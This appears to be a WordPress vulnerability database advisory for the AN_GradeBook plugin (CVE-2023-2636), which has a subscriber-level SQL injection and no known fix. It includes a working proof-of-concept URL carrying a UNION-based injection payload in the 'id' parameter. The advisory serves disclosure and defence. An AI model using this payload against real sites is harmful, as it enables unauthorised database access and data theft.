WordPress Plugin Vulnerabilities

AN_GradeBook <= 5.0.1 - Subscriber+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber

Proof of Concept

Access the following URL to demonstrate SQLi:

http://example.com/wp-admin/admin-ajax.php?action=course&id=-9264%20UNION%20ALL%20SELECT%20CONCAT(0x7171717071,0x5141527377414962644f774c4477524d43624b4e5a74584c594d58596f444141504e767158546162,0x717a767a71),NULL,NULL,NULL,NULL--%20-

Affects Plugins

Plugin icon
an-gradebook
No known fix

References

CVE
CVE-2023-2636

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Lukas Kinneberg
Submitter
Lukas Kinneberg
Submitter website
https://github.com/lukinneberg
Verified
Yes
WPVDB ID
6a3bfd88-1251-4d40-b26f-62950a3ce0b5

Timeline

Publicly Published
2023-06-26 (about 5 months ago)
Added
2023-06-26 (about 5 months ago)
Last Updated
2023-06-26 (about 5 months ago)

Other

Published
Title
Published
2022-03-07
Title
Sync WooCommerce Product feed to Google Shopping <= 1.2.4 - Admin+ SQLi
Published
2014-08-01
Title
Photo album - Remote SQL Injection
Published
2018-01-28
Title
User Control - Unauthenticated SQL Injection
Published
2023-08-11
Title
WooCommerce PDF Invoice Builder < 1.2.90 - Subscriber+ SQLi
Published
2022-07-22
Title
Homepage Product Organizer for WooCommerce <= 1.1 - Subscriber+ SQLi